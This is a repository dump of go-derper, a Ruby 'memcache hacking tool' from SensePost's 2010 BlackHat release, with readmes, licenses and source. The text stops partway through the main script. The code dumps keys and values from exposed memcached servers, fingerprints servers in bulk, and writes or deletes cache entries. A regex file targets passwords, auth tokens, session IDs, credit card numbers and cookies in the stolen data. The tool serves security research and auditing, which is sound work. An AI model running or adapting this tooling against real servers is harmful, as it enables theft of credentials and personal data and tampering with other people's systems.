├── cleanpage ├── regexs.txt ├── LICENSE.txt ├── memcache-client-license.txt ├── readme.old ├── README.markdown ├── memcacheex.rb ├── go-derper.rb └── memcache.rb /cleanpage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sensepost/go-derper/HEAD/cleanpage -------------------------------------------------------------------------------- /regexs.txt: -------------------------------------------------------------------------------- 1 | #IP Addresses 2 | ([1-2]?[0-9]?[0-9]\.[1-2]?[0-9]?[0-9]\.[1-2]?[0-9]?[0-9]\.[1-2]?[0-9]?[0-9]) 3 | #Credentials / tokens 4 | (pass.{1,50}) 5 | (user.{1,50}) 6 | (auth.{1,50}) 7 | #URLS 8 | (http[s]?://[-a-z0-9._@/?&=%:]+) 9 | (ftp://[a-z0-9.-_@/]+) 10 | #Session IDs 11 | (.{1,20}SESSION.{1,50}) 12 | #CC 13 | ([0-9]{4}[- .]?[0-9]{4}[- .]?[0-9]{4}[- .]?[0-9]{4}) 14 | (creditcard.{1,50}) 15 | (credit.?card.{1,50}) 16 | #Emails 17 | ([-a-z0-9_!]+@([-a-z0-9_]+\.)+(AC|AD|AE|AERO|AF|AG|AI|AL|AM|AN|AO|AQ|AR|ARPA|AS|ASIA|AT|AU|AW|AX|AZ|BA|BB|BD|BE|BF|BG|BH|BI|BIZ|BJ|BM|BN|BO|BR|BS|BT|BV|BW|BY|BZ|CAT|CA|CA|CC|CD|CF|CG|CH|CI|CK|CL|CM|CN|COM|CO|COOP|CR|CU|CV|CX|CY|CZ|DE|DJ|DK|DM|DO|DZ|EC|EDU|EE|EG|ER|ES|ET|EU|FI|FJ|FK|FM|FO|FR|GA|GB|GD|GE|GF|GG|GH|GI|GL|GM|GN|GOV|GP|GQ|GR|GS|GT|GU|GW|GY|HK|HM|HN|HR|HT|HU|ID|IE|IL|IM|INFO|INT|IN|IO|IQ|IR|IS|IT|JE|JM|JO|JOBS|JP|KE|KG|KH|KI|KM|KN|KP|KR|KW|KY|KZ|LA|LB|LC|LI|LK|LR|LS|LT|LU|LV|LY|MA|MC|MD|ME|MG|MH|MIL|MK|ML|MM|MN|MO|MOBI|MP|MQ|MR|MS|MTMUSEUM|MU||MV|MW|MX|MY|MZ||NAME|NA|NC|NE|NET|NF|NG|NI|NL|NO|NP|NR|NU|NZ|OM|ORG|PA|PE|PF|PG|PH|PK|PL|PM|PN|PR|PRO|PS|PT|PW|PY|QA|RE|RO|RS|RU|RW|SA|SB|SC|SD|SE|SG|SH|SI|SJ|SK|SL|SM|SN|SO|SR|ST|SU|SV|SY|SZ|TC|TD|TEL|TF|TG|TH|TJ|TK|TL|TM|TN|TO|TP|TR|TRAVEL|TT|TV|TW|TZ|UA|UG|UK|US|UY|UZ|VA|VC|VE|VG|VI|VN|VU|WF|WS|YE|YT|ZA|ZM|ZW)) 18 | #Cookies 19 | (cookie.{1,80}) 20 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2010, SensePost 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright 8 | notice, this list of conditions and the following disclaimer. 9 | * Redistributions in binary form must reproduce the above copyright 10 | notice, this list of conditions and the following disclaimer in the 11 | documentation and/or other materials provided with the distribution. 12 | * Neither the name of the nor the 13 | names of its contributors may be used to endorse or promote products 14 | derived from this software without specific prior written permission. 15 | 16 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 17 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 18 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 19 | DISCLAIMED. 
IN NO EVENT SHALL BE LIABLE FOR ANY 20 | DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 21 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 22 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND 23 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 24 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 25 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | -------------------------------------------------------------------------------- /memcache-client-license.txt: -------------------------------------------------------------------------------- 1 | Copyright 2005-2009 Bob Cottrell, Eric Hodel, Mike Perham. 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions 6 | are met: 7 | 8 | 1. Redistributions of source code must retain the above copyright 9 | notice, this list of conditions and the following disclaimer. 10 | 2. Redistributions in binary form must reproduce the above copyright 11 | notice, this list of conditions and the following disclaimer in the 12 | documentation and/or other materials provided with the distribution. 13 | 3. Neither the names of the authors nor the names of their contributors 14 | may be used to endorse or promote products derived from this software 15 | without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED BY THE AUTHORS ``AS IS'' AND ANY EXPRESS 18 | OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 19 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE 21 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, 22 | OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT 23 | OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR 24 | BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 25 | WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE 26 | OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, 27 | EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | 29 | -------------------------------------------------------------------------------- /readme.old: -------------------------------------------------------------------------------- 1 | (c) SensePost 2010 2 | 3 | License: BSD (See LICENSE.txt) 4 | 5 | ---------------------------------- 6 | go-derper.rb - marco@sensepost.com 7 | ---------------------------------- 8 | 9 | 1. Intro 10 | -------- 11 | 12 | Quick 'n dirty tool for extracting stuff from memcached servers, as well as for basic manipulations of the cache 13 | including monitoring various stats, writing into the cache and deleting entries. 14 | 15 | 2. Requirements 16 | --------------- 17 | 18 | - Ruby (Tested on 1.8.6) 19 | - memcache-client gem (gem install memcache-client) 20 | Note: we include a modified memcache.rb from memcache-client. Thus parts of this package 21 | are subject to their BSD license. See memcache-client-license.txt 22 | - disk space and bandwidth :) 23 | 24 | 3. 
Comman Usage Examples 25 | ----------------------- 26 | 27 | Extract contents of a cache (defaults to 10 keys per slab) 28 | ./go-derper.rb -l -s 29 | 30 | Extract contents of a cache, using 100 keys per slab 31 | ./go-derper.rb -l -K 100 -s 32 | 33 | Extract contents of a cache, using 100 keys per slab, print out values matching regexes found regexs.txt 34 | ./go-derper.rb -l -K 100 -s -R regexs.txt 35 | 36 | Write back into the cache, the value stored at output/run5-c4ecee795335e7ef662e661974699448 37 | ./go-derper.rb -w output/run5-c4ecee795335e7ef662e661974699448 38 | When writing values into the cache, local paths needs to be resolved. Run go-derper from inside it's 39 | own root. 40 | 41 | Delete the value stored at output/run5-c4ecee795335e7ef662e661974699448 42 | ./go-derper.rb -d output/run5-c4ecee795335e7ef662e661974699448 43 | When deleting values from the cache, local paths needs to be resolved. Run go-derper from inside it's 44 | own root. 45 | 46 | Pull stats from one cache: 47 | ./go-derper.rb -s -S 48 | 49 | Fingerprint multiple caches: 50 | ./go-derper.rb -f ,,..., 51 | 52 | Fingerprint multiple caches stored in a file (one per line): 53 | ./go-derper.rb -F 54 | 55 | Monitor a single cache to watch changes: 56 | ./go-derper.rb -m -s 57 | 58 | Pull a single key: 59 | ./go-derper.rb -k -s 60 | 61 | 4. More 62 | ------- 63 | 64 | www.sensepost.com 65 | -------------------------------------------------------------------------------- /README.markdown: -------------------------------------------------------------------------------- 1 | #1. Name 2 | go-derper - Memcache hacking tool 3 | #2. Author 4 | Marco Slaviero < marco(at)sensepost(dot)com > 5 | #3. License, version & release date 6 | License : BSD 7 | Version : v1.0 8 | Release Date : 2010 9 | 10 | #4. Description 11 | go-derper.rb is a tool for hacking memcached servers, released as part of our BlackHat USA. It uses elements of the memcached protocol to derive full lists of keys stored on the memcached server, and can therefore extract the contents of the cache. 12 | 13 | In addition, it also supports basic searching of retrieved data via user-configurable regular expressions, fingerprinting of multiple caches, monitoring usage in caches as well as basic cache content manipulations such as value insertion, overwrites and deletion. 14 | #5. Usage 15 | Extract contents of a cache (defaults to 10 keys per slab) 16 | > ./go-derper.rb -l -s < hostname > 17 | 18 | Extract contents of a cache, using 100 keys per slab 19 | > ./go-derper.rb -l -K 100 -s < hostname > 20 | 21 | Extract contents of a cache, using 100 keys per slab, print out values matching regexes found regexs.txt 22 | > ./go-derper.rb -l -K 100 -s < hostname > -R regexs.txt 23 | 24 | Write back into the cache, the value stored at output/run5-c4ecee795335e7ef662e661974699448 25 | > ./go-derper.rb -w output/run5-c4ecee795335e7ef662e661974699448 26 | When writing values into the cache, local paths needs to be resolved. Run go-derper from inside it's 27 | own root. 28 | 29 | Delete the value stored at output/run5-c4ecee795335e7ef662e661974699448 30 | > ./go-derper.rb -d output/run5-c4ecee795335e7ef662e661974699448 31 | When deleting values from the cache, local paths needs to be resolved. Run go-derper from inside it's 32 | own root. 
33 | 34 | Pull stats from one cache: 35 | > ./go-derper.rb -s < hostname > -S 36 | 37 | Fingerprint multiple caches: 38 | > ./go-derper.rb -f < host1 >,< host2 >,...,< hostn > 39 | 40 | Fingerprint multiple caches stored in a file (one per line): 41 | > ./go-derper.rb -F < file > 42 | 43 | Monitor a single cache to watch changes: 44 | > ./go-derper.rb -m -s < hostname > 45 | 46 | Pull a single key: 47 | > ./go-derper.rb -k < keyid > -s < hostname > 48 | #6. Requirements 49 | - Ruby (Tested on 1.8.6) 50 | - memcache-client gem (gem install memcache-client) 51 | Note: we include a modified memcache.rb from memcache-client. Thus parts of this package 52 | are subject to their BSD license. See memcache-client-license.txt 53 | - disk space and bandwidth :) 54 | 55 | #7. Additional Resources 56 | Blog, BlackHat Write-up: go-derper and mining memcaches - http://www.sensepost.com/blog/4873.html 57 | -------------------------------------------------------------------------------- /memcacheex.rb: -------------------------------------------------------------------------------- 1 | require 'rubygems' 2 | require 'memcache' 3 | module Debug 4 | DEBUG=1 5 | VERBOSE=2 6 | INFO=3 7 | WARNING=4 8 | ERROR=5 9 | NONE=6 10 | @@minl = INFO 11 | 12 | def dbgprint(level, msg) 13 | if level >= @@minl then 14 | case level 15 | when DEBUG 16 | print "[d] " 17 | when VERBOSE 18 | print "[v] " 19 | when INFO 20 | print "[i] " 21 | when WARNING 22 | print "[w] " 23 | when ERROR 24 | print "[E] " 25 | end 26 | puts msg 27 | end 28 | end 29 | 30 | def dprint(msg) 31 | dbgprint(Debug::DEBUG, msg) 32 | end 33 | 34 | def vprint(msg) 35 | dbgprint(Debug::VERBOSE, msg) 36 | end 37 | 38 | def iprint(msg) 39 | dbgprint(Debug::INFO, msg) 40 | end 41 | 42 | def wprint(msg) 43 | dbgprint(Debug::WARNING, msg) 44 | end 45 | 46 | def eprint(msg, die=false) 47 | dbgprint(Debug::ERROR, msg) 48 | exit(1) if die 49 | end 50 | end 51 | include Debug 52 | 53 | class MemCacheEx < MemCache 54 | attr :version 55 | @caps = nil 56 | 57 | def slabs 58 | self.stats("slabs") 59 | end 60 | 61 | def settings 62 | self.stats("settings") 63 | end 64 | 65 | def items 66 | self.stats("items") 67 | end 68 | 69 | def caps 70 | @caps 71 | end 72 | 73 | 74 | 75 | def probe_stats_capabilities 76 | all_known_capabilities = [{""=>nil}, 77 | {"slabs"=>nil}, 78 | {"settings"=>nil}, 79 | {"items"=>nil}, 80 | {"tap"=>nil}, 81 | {"hash"=>nil}, 82 | {"vbucket"=>nil},#check is superfluous, as it requires further, unknown params 83 | {"key"=>nil},#check is superfluous, as it requires further, unknown params 84 | {"vkey"=>nil}]#check is superfluous, as it requires further, unknown params 85 | @caps = [] 86 | all_known_capabilities.each do |cap| 87 | c = cap.keys[0] 88 | args = cap[c] 89 | dprint("Testing for \"#{c}\"") 90 | begin 91 | self.stats(c+(args.nil? ? 
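# get_slabs_info (defined above) merges "stats slabs" and "stats items" output into a
# nested hash; an illustrative (assumed) shape for one server is:
#   { "10.0.0.1:11211" => { "1" => { "chunk_size" => "96", "number" => "12", ... } } }
# Here only the slab class ids (the keys of the inner hash) are of interest.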
"":" "+args)) 92 | if c == "" then 93 | @caps << "(stat)" 94 | else 95 | @caps << c 96 | end 97 | rescue MemCache::MemCacheError 98 | dprint("\"#{c}\" not supported") 99 | end 100 | end 101 | begin 102 | self.set("TESTWRITEINTOTHECACHE_FROM_MEMCRASHED","yousaidyourdogdoesnotbitethatisnotmydog",0,true,123) 103 | @caps << "(set)" 104 | dprint("Successfully wrote into cache") 105 | rescue Exception => e 106 | iprint("Cannot set entries in the cache: #{e.to_s}") 107 | end 108 | begin 109 | flags,r = self.get("TESTWRITEINTOTHECACHE_FROM_MEMCRASHED",true) 110 | if r == "yousaidyourdogdoesnotbitethatisnotmydog" and flags == 123 then 111 | @caps << "(get)" 112 | dprint("Successfully pulled from the cache") 113 | else 114 | iprint("Retrieval opeation returned an unexpected value (#{r})") 115 | end 116 | rescue Exception => e 117 | iprint("Cannot get entries from cache: #{e.to_s}") 118 | end 119 | 120 | #@caps.each {|c| s+="#{c} "} 121 | vprint("Capabilities supported: #{@caps.collect{|c| "#{c} "}}") 122 | @caps 123 | end 124 | 125 | def debug_enable 126 | raise MemCacheError, "No active servers" unless active? 127 | 128 | complete=false 129 | @servers.each do |server| 130 | next unless server.alive? 131 | 132 | with_socket_management(server) do |socket| 133 | cmd = "stats detail on\r\n" 134 | socket.write cmd 135 | line = socket.gets 136 | raise_on_error_response! line 137 | complete=true 138 | end 139 | end 140 | 141 | raise MemCacheError, "No active servers" if !complete 142 | return true 143 | end 144 | 145 | def get_slabs_info 146 | #we pull two sets of slabs info from the cache, using "stats slabs" and "stats items" 147 | #data is merged into a single structure 148 | raise MemCacheError, "No active servers" unless active? 149 | dprint("Entered get_slabs_info") 150 | tmp_slabs_info = {} 151 | slabs=self.slabs 152 | slabs.keys.each do |server| 153 | dprint("get_slabs_info(): working on #{server}") 154 | slabs[server].keys.each do |i| 155 | dprint("get_slabs_info(): working on #{i}") 156 | (slabs_id,info_key) = i.split(/:/) 157 | info_value = slabs[server][i] 158 | next unless !slabs_id.nil? and !info_key.nil? and !info_value.nil? 159 | tmp_slabs_info[server] = {} if tmp_slabs_info[server].nil? 160 | tmp_slabs_info[server][slabs_id] = {} if tmp_slabs_info[server][slabs_id].nil? 161 | tmp_slabs_info[server][slabs_id][info_key] = info_value 162 | end 163 | end 164 | 165 | #now repeat, except this time pulling items stats. results format is every so slightly different 166 | #hence the dupped code 167 | slabs=self.items 168 | slabs.keys.each do |server| 169 | dprint("get_slabs_info(): working on #{server}") 170 | slabs[server].keys.each do |i| 171 | dprint("get_slabs_info(): working on #{i}") 172 | (not_used,slabs_id,info_key) = i.split(/:/) 173 | info_value = slabs[server][i] 174 | next unless !slabs_id.nil? and !info_key.nil? and !info_value.nil? 175 | tmp_slabs_info[server] = {} if tmp_slabs_info[server].nil? 176 | tmp_slabs_info[server][slabs_id] = {} if tmp_slabs_info[server][slabs_id].nil? 177 | tmp_slabs_info[server][slabs_id][info_key] = info_value 178 | end 179 | end 180 | 181 | tmp_slabs_info.keys.each {|s| 182 | tmp_slabs_info[s].keys.each {|sl| 183 | tmp_slabs_info[s][sl].keys.each {|info| 184 | dprint "#{s}:#{sl}:#{info}->#{tmp_slabs_info[s][sl][info]}" 185 | } 186 | } 187 | } 188 | 189 | tmp_slabs_info 190 | end 191 | 192 | 193 | def get_slabs_ids 194 | raise MemCacheError, "No active servers" unless active? 
195 | #we deal with single servers at a time in a cache object, so we don't need to loop 196 | #through all possible servers (since there should be only one) 197 | slabs=get_slabs_info 198 | slabs.keys.each do |server| 199 | slabs[server]=slabs[server].keys 200 | end 201 | slabs 202 | end 203 | 204 | def get_keys(slabs_id, key_limit) 205 | raise MemCacheError, "No active servers" unless active? 206 | server_items = {} 207 | dprint("Entered get_keys(#{slabs_id},#{key_limit})") 208 | 209 | @servers.each do |server| 210 | next unless server.alive? 211 | dprint("Retrieving #{key_limit} keys from slabs #{slabs_id} on server #{server.host}") 212 | 213 | with_socket_management(server) do |socket| 214 | value = nil 215 | cmd = "stats cachedump #{slabs_id} #{key_limit}\r\n" 216 | 217 | socket.write cmd 218 | stats = {} 219 | while line = socket.gets do 220 | raise_on_error_response! line 221 | break if line == "END\r\n" 222 | if line =~ /ITEM ([\S]+) (\[.+\])/ then 223 | name, value = $1, $2 224 | stats[name] = value 225 | end 226 | end 227 | server_items["#{server.host}:#{server.port}"] = stats 228 | end 229 | end 230 | 231 | raise MemCacheError, "No active servers" if server_items.empty? 232 | server_items 233 | end 234 | 235 | def namespace=(namespace) 236 | @namespace = namespace 237 | end 238 | 239 | end 240 | -------------------------------------------------------------------------------- /go-derper.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'digest/sha1' 4 | require "getoptlong" 5 | #require 'rubygems' 6 | require 'memcacheex' 7 | require 'zlib' 8 | 9 | 10 | #while true do 11 | # key=(rand*100).to_i.to_s 12 | # value=(rand*10000).to_i.to_s 13 | # CACHE.set(key,value) 14 | #end 15 | 16 | 17 | class Console 18 | def Console.clear 19 | $stdout.write "#{27.chr}[2J" if @@minl >= INFO 20 | end 21 | end 22 | 23 | class Leacher 24 | @cache=nil 25 | attr :server_debug_configured 26 | 27 | def set_cache(cache) 28 | if !cache.nil? 29 | throw Exception.new("Object is not a MemCache") if cache.class != MemCache and cache.class != MemCacheEx 30 | @cache = cache 31 | end 32 | end 33 | 34 | 35 | def Leacher(cache=nil) 36 | set_cache(cache) 37 | self.server_debug_configured = true 38 | end 39 | 40 | def open(cache=nil) 41 | set_cache(cache) 42 | end 43 | 44 | def canleach? 45 | begin 46 | @cache.debug_enable 47 | server_debug_configured = true 48 | return true 49 | rescue MemCache::MemCacheError 50 | return false 51 | end 52 | end 53 | 54 | #leach will either try to fetch a key specified with -k, or determine keys through the debug functions 55 | def leach(slabs_to_retrieve,key_limit,requested_key,&block) 56 | servers = {} 57 | 58 | begin 59 | @cache.debug_enable if !self.server_debug_configured 60 | rescue MemCacheError 61 | eprint("Could not enable debug mode on server, can't leach.") 62 | return false 63 | end 64 | 65 | if !requested_key.nil? then 66 | dprint("Only fetch a single key, \"#{requested_key}\"") 67 | flags,val=@cache.get(requested_key,true) 68 | if val.nil? then 69 | eprint("No entry found") 70 | else 71 | yield -1, requested_key.dup, flags, val.dup 72 | end 73 | return 74 | end 75 | 76 | if slabs_to_retrieve.nil? 
or slabs_to_retrieve == "" 77 | servers = @cache.get_slabs_ids 78 | else 79 | servers[@cache.servers[0].host+":"+@cache.servers[0].port.to_s] = [slabs_to_retrieve.to_i] 80 | end 81 | 82 | dprint("Starting to leach") 83 | servers.each do |server,slabs| 84 | slabs.each do |slabs_id| 85 | slabs_id = slabs_id.to_i if !slabs_id.is_a?(Integer) 86 | throw Exception.new("Slabs id (#{slabs_id.to_s}) must be an integer >= 0") if (!slabs_id.is_a?(Integer) or !(slabs_id > 0)) 87 | dprint("Leach on slabs #{slabs_id}") 88 | ret=@cache.get_keys(slabs_id, key_limit) 89 | ret=ret[ret.keys[0]] 90 | 91 | @cache.namespace = nil 92 | 93 | ret.keys.each do |key_id| 94 | #if (key_id =~ /(\S+):(\S+)/) then 95 | # @cache.namespace, key_id = $1, $2 96 | #else 97 | #end 98 | flags,val=@cache.get(key_id, true) 99 | dprint("#{key_id} -> #{val}") 100 | val = "(nil)" if val.nil? 101 | yield slabs_id, key_id.dup, flags, val.dup 102 | end 103 | end 104 | end 105 | end 106 | end 107 | 108 | class Stats 109 | @stats=nil 110 | @cache=nil 111 | @@header_printed=false 112 | 113 | def refresh_cache(submenu=nil) 114 | @stats = @cache.stats(submenu).shift[1] if !@cache.nil? 115 | throw Exception.new("stats request for #{submenu} returned nil") if @stats.nil? 116 | @stats 117 | end 118 | 119 | def set_cache(cache) 120 | if !cache.nil? 121 | throw Exception.new("Object (#{cache.class}) is not a MemCache") if !cache.is_a?(MemCache) or !cache.is_a?(MemCacheEx) 122 | 123 | throw Exception.new("Stats for #{cache.stats.length.to_i} servers found, except I'm expecting only 1") if cache.stats.length != 1 124 | 125 | @cache = cache 126 | 127 | refresh_cache 128 | end 129 | end 130 | 131 | def Stats(cache=nil) 132 | set_cache(cache) 133 | end 134 | 135 | def Stats(server, port, namespace) 136 | set_cache(MemCache.new(server+":"+port,:namespace => namespace)) 137 | end 138 | 139 | def open(cache=nil) 140 | if @stats.nil? 141 | if cache.nil? 142 | Exception.new("No stored or supplied cache object") 143 | else 144 | set_cache(cache) 145 | end 146 | end 147 | end 148 | 149 | def method_missing(meth) 150 | throw Exception.new("No cache object") if @stats.nil? 151 | refresh_cache 152 | 153 | throw NoMethodError.new("undefined method `#{meth.id2name}'") if @stats[meth.id2name].nil? 154 | @stats[meth.id2name] 155 | end 156 | 157 | def get_field(field) 158 | throw Exception.new("No cache object") if @stats.nil? 159 | 160 | return all_fields if field == "all" 161 | 162 | throw Exception.new("No such field #{field}") if @stats[field].nil? 163 | @stats[field] 164 | end 165 | 166 | def all_fields 167 | throw Exception.new("No cache object") if @stats.nil? 168 | str="" 169 | @stats.keys.sort.each {|k| str+= "#{k} -> #{@stats[k]}\n"} 170 | str 171 | end 172 | 173 | def print_all_fields 174 | throw Exception.new("No cache object") if @stats.nil? 
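# @stats is a flat hash of stat-name => value pairs (keys such as "curr_items",
# "uptime", "bytes_read"), populated from the server's "stats" command by refresh_cache.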
175 | @stats.keys.sort.each do |k| 176 | dbgprint INFO, "#{k} -> #{@stats[k]}" 177 | end 178 | end 179 | 180 | @@lengths={:k=>0,:c=>0,:p=>0,:r=>0,:t=>0,:m=>0} 181 | def print_monitored_data data 182 | keys = data[:base].keys.sort 183 | 184 | t_time = data[:total_elapsed_time] 185 | p_time = data[:poll_elapsed_time] 186 | 187 | l=@@lengths 188 | 189 | Console.clear 190 | 191 | puts "Monitoring memcached on #{@cache.servers[0].host}:#{@cache.servers[0].port}, monitor uptime is #{"%.2fs" %data[:total_elapsed_time]}\n\n" 192 | keys.each do |k| 193 | #puts "#{k}: prev change #{data[:changed][k]} in #{"%.2f" % t} s, running totals #{data[:running][k]}, total movement #{data[:base][k]} ("+ ("%.2f" % (data[:base][k].to_f/t)) +"/s)" 194 | l[:k] = k.length+1 if k.length>l[:k] 195 | c="current #{data[:current][k]}" 196 | l[:c] = c.length+1 if c.length>l[:c] 197 | p="prev change #{data[:changed][k]} in #{"%.2f" % p_time}s" 198 | l[:p] = p.length+1 if p.length>l[:p] 199 | r="running totals #{data[:running][k]}"# (avg #{"%.2f" % (data[:running][k].to_f/p_time)} chgs/s)" 200 | l[:r] = r.length+1 if r.length>l[:r] 201 | t="total movement #{data[:base][k]} ("+ ("%.2f" % (data[:base][k].to_f/t_time)) +"/s)" 202 | l[:t] = t.length+1 if t.length>l[:t] 203 | m="biggest movement #{data[:movers][k][:move]} ("+ ("%.2f" % (Time.now-data[:movers][k][:time_distance]).to_f) +"s ago)" 204 | l[:m] = m.length+1 if m.length>l[:m] 205 | 206 | printf "%-#{l[:k]}s: %-#{l[:c]}s %-#{l[:p]}s %-#{l[:r]}s %-#{l[:t]}s %-#{l[:m]}s\n", k, c, p, r, t, m 207 | end 208 | 209 | end 210 | 211 | def monitor(limit,submenu,gap) 212 | dprint "Entered #{caller(0)[0]}" 213 | #we'll track every key that changed in the course of monitoring, not just singe the last poll 214 | changed_keys=[] 215 | base_measure=refresh_cache(submenu).dup 216 | running_totals={} 217 | changed_totals=nil 218 | dprint "Base measure obtained" 219 | base_time=Time.now 220 | first_time=nil 221 | poll_time=nil 222 | biggest_movers={} 223 | 224 | first_measure=refresh_cache(submenu).dup 225 | while limit >= 0 226 | first_time = Time.now 227 | sleep(gap) 228 | poll_measure=refresh_cache(submenu).dup 229 | poll_time=Time.now 230 | total_elapsed_time = poll_time - base_time 231 | poll_elapsed_time = poll_time - first_time 232 | 233 | dprint "Poll measure obtained" 234 | 235 | changed_totals={} 236 | base_measure.keys.sort.each do |k| 237 | begin 238 | Integer(base_measure[k]) 239 | Integer(first_measure[k]) 240 | Integer(poll_measure[k]) 241 | diff=poll_measure[k].to_i-first_measure[k].to_i 242 | next if diff == 0 243 | changed_keys<0, :move=>0} if biggest_movers[k].nil? 249 | if diff.abs > biggest_movers[k][:move].abs then 250 | biggest_movers[k][:time_distance]=poll_time 251 | biggest_movers[k][:move]=diff 252 | end 253 | 254 | 255 | dprint "#{k}: #{diff} (#{diff.to_f/poll_elapsed_time} changes/sec)" 256 | rescue ArgumentError 257 | end 258 | end 259 | 260 | monitored_data={:total_elapsed_time => total_elapsed_time, :poll_elapsed_time => poll_elapsed_time,:current=>{},:base =>{},:running=>{},:changed=>{},:movers=>{}} 261 | changed_keys.each do |k| 262 | throw Exception.new("Unexpected absent key #{k}") if base_measure[k].nil? or poll_measure[k].nil? 
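# For each stat that has changed, the fields assigned below mean:
#   :current – the latest raw value from this poll
#   :base    – total movement since monitoring began (relative to base_measure)
#   :running – movement accumulated over all polls so far
#   :changed – movement during the most recent poll interval
#   :movers  – the largest single-poll movement seen, and when it occurred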
263 | monitored_data[:current][k] = poll_measure[k].to_i 264 | monitored_data[:base][k] = (poll_measure[k].to_i-base_measure[k].to_i).to_f 265 | monitored_data[:running][k] = running_totals[k].to_f 266 | monitored_data[:changed][k] = changed_totals[k] 267 | monitored_data[:movers][k] = biggest_movers[k] 268 | 269 | end 270 | 271 | print_monitored_data monitored_data 272 | 273 | if limit == 1 274 | limit -= 2 275 | elsif limit > 0 276 | limit -= 1 277 | end 278 | 279 | first_measure=poll_measure 280 | end 281 | dprint "Left #{caller(0)[0]}" 282 | end 283 | 284 | def pretty_time(t) 285 | return if t.nil? 286 | #arb constant to separate sec-since-epoch from plain seconds counts 287 | if t > 1050000000 then 288 | return Time.at(t).to_s 289 | end 290 | 291 | s="" 292 | sec=0 293 | min=0 294 | hour=0 295 | day=0 296 | t=t.to_f 297 | 298 | if t / (24 * 3600) >= 1 then 299 | day=(t / (24 * 3600)).floor 300 | t-=day*(24*3600) 301 | end 302 | if t / (3600) >= 1 then 303 | hour=(t / (3600)).floor 304 | t-=hour*(3600) 305 | end 306 | if t / (60) >= 1 then 307 | min=(t / (60)).floor 308 | t-=min*(60) 309 | end 310 | sec=t 311 | 312 | sprintf("%i:%02i:%02i:%02i",day,hour,min,sec) 313 | end 314 | 315 | def pretty_num(m) 316 | return if m.nil? 317 | if m > 10**12 318 | return sprintf("%.2ft",m.to_f/10**12) 319 | elsif m > 10**9 320 | return sprintf("%.2fb",m.to_f/10**9) 321 | elsif m > 10**6 322 | return sprintf("%.2fm",m.to_f/10**6) 323 | elsif m > 10**3 324 | return sprintf("%.2fk",m.to_f/10**3) 325 | else 326 | return sprintf("%i",m) 327 | end 328 | end 329 | 330 | def pretty_mem(m) 331 | return if m.nil? 332 | if m > 2**40 333 | return sprintf("%.2f TB",m.to_f/2**40) 334 | elsif m > 2**30 335 | return sprintf("%.2f GB",m.to_f/2**30) 336 | elsif m > 2**20 337 | return sprintf("%.2f MB",m.to_f/2**20) 338 | elsif m > 2**10 339 | return sprintf("%.2f KB",m.to_f/2**10) 340 | else 341 | return sprintf("%i B",m) 342 | end 343 | end 344 | 345 | def print_fingerprint(fp,output_format) 346 | #puts "\n\n#{@cache.servers[0].host}:#{@cache.servers[0].port}\n==============================" 347 | if @@header_printed == true then 348 | dprint("@@header_printed = true") 349 | elsif @@header_printed == false then 350 | dprint("@@header_printed = false") 351 | else 352 | dprint("@@header_printed = "+@@header_printed) 353 | end 354 | 355 | if output_format == "csv" then 356 | if @@header_printed == false then 357 | puts "Host,Version,PID,Uptime,Systime,Utime,Stime,Max Bytes,Max Item Size,Current Connections,Net Bytes Read,Net Bytes Written,Get Count,Set Count,Bytes Stored,Item Count,Total Items,Total Slabs,Stats Capabilities" 358 | @@header_printed = true 359 | end 360 | puts "#{@cache.servers[0].host}:#{@cache.servers[0].port},#{fp[:runenv][:version]},#{fp[:runenv][:pid]},"+pretty_time(fp[:runenv][:uptime])+","+pretty_time(fp[:runenv][:time])+",#{"%.2f" % fp[:runenv][:rusage_user]},#{"%.2f" % fp[:runenv][:rusage_system]},#{fp[:memory][:maxbytes]},#{fp[:memory][:item_size_max]},#{fp[:runenv][:curr_connections]},#{fp[:network][:bytes_read]},#{fp[:network][:bytes_written]},#{fp[:cache][:cmd_get]},#{fp[:cache][:cmd_set]},#{fp[:cache][:bytes]},#{fp[:cache][:curr_items]},#{fp[:cache][:total_items]},#{fp[:cache][:total_slabs]},#{fp[:runenv][:capabilities].join(" ")}" 361 | elsif output_format == "multiline" then 362 | puts "#{@cache.servers[0].host}:#{@cache.servers[0].port}\n==============================" 363 | 364 | puts "memcached #{fp[:runenv][:version]} (#{fp[:runenv][:pid]}) up "+pretty_time(fp[:runenv][:uptime])+", sys 
